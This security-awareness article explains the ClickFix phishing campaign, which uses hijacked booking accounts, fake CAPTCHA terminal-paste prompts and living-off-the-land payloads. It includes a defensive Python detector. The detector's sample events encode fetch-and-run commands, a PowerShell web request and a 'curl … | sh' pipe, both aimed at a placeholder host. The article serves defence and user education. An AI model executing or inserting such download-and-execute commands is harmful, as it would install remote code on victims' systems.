ClickFix: The Overlooked Security Risk Families Should Know

Researchers in November 2025 disclosed a cross-platform phishing campaign known as ClickFix that exploits compromised travel-booking accounts and browser-based prompts to trick victims into executing code. Attackers first gain access to hotel Booking.com or other online travel-service accounts and contact people with pending reservations to create trust. Victims who follow a fake CAPTCHA-like prompt are asked to copy a short text string into a terminal or command window, a step that installs a Windows backdoor tracked as PureRAT or device-specific payloads for macOS. Security firms warn that many payloads use living-off-the-land techniques and browser sandbox copy/paste paths that make detection difficult, so user awareness is currently the clearest defense.

Key Takeaways

  • Campaign vector: Attackers hijack hotel or travel-service accounts (e.g., Booking.com) to message customers with pending reservations, leveraging existing trust.
  • Deception method: Victims are shown a fake CAPTCHA resembling Cloudflare and asked to paste a string into a terminal; that action triggers malware installation.
  • Malware families: Windows infections have been tracked as PureRAT; other payloads target macOS when the landing page detects that OS.
  • Evading detection: Many payloads are LOLBins—native OS binaries and scripts—and commands are often base64-encoded and executed via browser sandbox copy/paste.
  • Security tooling limits: Endpoint protections such as Microsoft Defender may detect some activity but can be bypassed when no malicious file is written to disk and execution uses trusted binaries.
  • User psychology: Recipients trust messages tied to confirmed reservations or top search results, making copy-paste prompts unusually persuasive.
  • Seasonal risk: Family gatherings and travel in coming weeks raise the odds that less tech-savvy people will encounter ClickFix-style scams.

Background

Phishing has long relied on social trust, but recent campaigns have shifted from links and attachments to interactive instructions that request direct user action inside system consoles. Travel-booking services hold structured data—names, reservation codes, contact addresses—that attackers can weaponize to craft context-aware messages that look legitimate. Hotel staff or property managers often use shared booking accounts, and a compromised account can enable attackers to reach dozens or hundreds of guests who expect transactional communications.

At the same time, defenders face a technical handicap: modern operating systems include powerful, signed utilities and scripting engines intended for administrators. Attackers increasingly favor ‘living off the land’ techniques that repurpose these trusted tools, reducing reliance on easily flagged binaries. Browser sandboxes complicate visibility further; copy/paste actions inside a browser can hand base64-encoded commands to a native shell without producing an obvious file on disk, sidestepping many signature- and file-based detections.

Main Event

According to analysts at Sekoia and reporting by Push Security, campaigns begin with account compromise on a travel service used by hotels or hosts. With control of the account, attackers message guests with pending or recent reservations, referencing reservation details to establish legitimacy. The malicious landing page often mimics Cloudflare-style CAPTCHA flows and instructs the visitor to prove they are human by copying a short code into a system terminal or command window.

On Windows systems, that simple copy-and-paste step executes commands that fetch and run a backdoor tracked by researchers as PureRAT. On macOS and other platforms the same landing page adapts and delivers different payloads that may rely on native utilities. Push Security described the page as ‘adapting to the device that you’re visiting from,’ a design that increases success across user environments.

Many of the commands are base64-encoded to obscure intent and are executed through standard OS tools—so-called LOLBins—rather than by dropping a new executable to disk. Analysts observed that the payload sequence frequently runs from the browser sandbox context or via clipboard interactions, which limits telemetry and automated detection by many endpoint tools.

Analysis & Implications

Strategically, ClickFix separates trust-building from execution. By leveraging legitimate reservation metadata and channels, attackers bypass the initial skepticism most users have against email links or attachments. This social engineering inversion—where a site asks for a benign-looking terminal paste—preys on an assumption many people do not question: that copying short technical strings provided by a known service is safe.

Technically, living-off-the-land attacks stress defenses based on file signatures and static indicators. When signed system binaries perform the work and no malicious artifacts are written to disk, heuristic and behavioral detection become crucial. But those approaches generate more false positives and require richer telemetry, which not all organizations or consumer products provide by default.

The consumer impact is significant because travel-related messages are common and time-sensitive. Families planning trips or relatives coordinating stays during holiday periods may be particularly vulnerable. For businesses in hospitality and travel, the reputational harm from account compromises and fraudulent messages could lead to increased verification friction for legitimate customers.

Comparison & Data

Stage              | Technique                              | Detection difficulty
-------------------+----------------------------------------+------------------------------------------
Initial contact    | Compromised booking account messages   | Medium (can mimic legitimate templates)
Execution trigger  | Fake CAPTCHA and terminal paste        | High (user-initiated, no file dropped)
Payload            | LOLBins / base64 commands / PureRAT    | High (native tools, in-memory execution)

The table above shows why ClickFix-style campaigns are difficult to detect: the contact phase blends with routine communications, the execution requires explicit user action, and the payload uses native mechanisms to conceal activity. Organizations with richer behavioral analytics and telemetry covering clipboard and process tree events will detect more incidents; endpoint-only signature defenses are less reliable alone.
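As an added illustration (not code from the article or from the vendors it cites) of the process-tree telemetry the table points to, the Python triage routine below scores a process-creation event: a native shell spawned from a browser or desktop shell, a base64-encoded command line that it decodes for the analyst, and fetch/evaluate hints in the decoded text. The process names, the two-signal alert threshold and the sample events are assumptions, and "payload.invalid" is a placeholder host.

```python
import base64
import re

# Assumed process names; real telemetry schemas (Sysmon, EDR, macOS ESF) vary by product.
LAUNCHERS = {"chrome.exe", "msedge.exe", "firefox.exe", "safari", "explorer.exe", "terminal"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
          "bash", "sh", "zsh", "osascript"}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
FETCH_HINTS = ("http://", "https://", "invoke-webrequest", "invoke-expression", "curl ")

def decode_candidates(cmdline: str) -> list[str]:
    """Decode long base64 tokens as UTF-8, then UTF-16LE (PowerShell -EncodedCommand)."""
    out = []
    for tok in B64_TOKEN.findall(cmdline):
        try:
            raw = base64.b64decode(tok + "=" * (-len(tok) % 4), validate=True)
        except ValueError:  # looked like base64 but is not
            continue
        for enc in ("utf-8", "utf-16-le"):
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if text.isprintable():  # UTF-16LE text read as UTF-8 contains NULs and is rejected
                out.append(text)
                break
    return out

def analyze_event(event: dict) -> dict:
    """Score one process-creation event; alert when at least two signals coincide."""
    parent, image = event["parent"].lower(), event["image"].lower()
    decoded = decode_candidates(event["cmdline"])
    reasons = []
    if image in SHELLS and parent in LAUNCHERS:
        reasons.append("shell spawned from a browser or desktop shell")
    if decoded:
        reasons.append("base64-encoded command decoded")
    # Fetch/eval hints are matched against the decoded text plus the visible command line
    visible = (B64_TOKEN.sub(" ", event["cmdline"]) + " " + " ".join(decoded)).lower()
    if image in SHELLS and any(hint in visible for hint in FETCH_HINTS):
        reasons.append("command fetches or evaluates remote content")
    return {"alert": len(reasons) >= 2, "reasons": reasons, "decoded": decoded}

# Constructed sample events, not real telemetry; "payload.invalid" is a placeholder host.
SAMPLE_EVENTS = [
    {"parent": "msedge.exe", "image": "powershell.exe", "cmdline": "powershell.exe -w hidden -enc "
     + base64.b64encode("Invoke-WebRequest http://payload.invalid/stage".encode("utf-16-le")).decode()},
    {"parent": "Terminal", "image": "bash", "cmdline": "bash -c 'echo "
     + base64.b64encode(b"curl -s http://payload.invalid/mac").decode() + " | base64 -d | sh'"},
    {"parent": "code.exe", "image": "powershell.exe", "cmdline": "powershell.exe -File build.ps1"},
]
```

Running `analyze_event` over `SAMPLE_EVENTS` alerts on the first two events with the decoded payload attached and leaves the developer's `build.ps1` launch untouched.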

Reactions & Quotes

Security vendors and platform providers reacted by documenting tactics and urging both technical and user-focused countermeasures. Below are brief excerpts from public comments, each set in context of the reporting.

“adapting to the device that you’re visiting from”

Push Security (research note)

This wording describes how the same landing page serves different payloads based on OS fingerprinting, increasing cross-platform reach. Push Security’s analysis emphasized the adaptive payload delivery as a force multiplier for attackers.

“many payloads rely on living-off-the-land techniques”

Microsoft (security advisory)

Microsoft’s advisory framed LOLBins as a core evasive mechanism in these campaigns and highlighted the limitations of file-based scanning when native binaries perform malicious actions. The company recommended layered defenses, including behavior monitoring and telemetry collection.

Unconfirmed

  • The full scale of infections tied specifically to ClickFix campaigns has not been publicly enumerated by vendors and remains unconfirmed.
  • It is not always clear whether compromised travel accounts were accessed through credential theft, credential stuffing, or internal account takeover; attribution of initial access varies by incident.
  • Precise bypass rates for Microsoft Defender and other endpoint products against these specific techniques have not been released and likely differ by configuration.

Bottom Line

ClickFix-style scams represent a meaningful evolution in phishing: they mix credible, context-aware outreach with execution techniques that exploit user trust and native system tools. Because the attack depends on a simple human action—copying and pasting a short string—the most effective immediate defense is informed, cautious behavior by users who receive unexpected instructions.

Technical defenses should adapt by improving behavioral detection, monitoring clipboard and process chain events where privacy and platform constraints permit, and hardening account security at travel platforms to reduce the number of compromised sender addresses. In the near term, families and frontline help-givers should treat any request to paste code into a terminal as suspicious and verify requests through separate channels before complying.
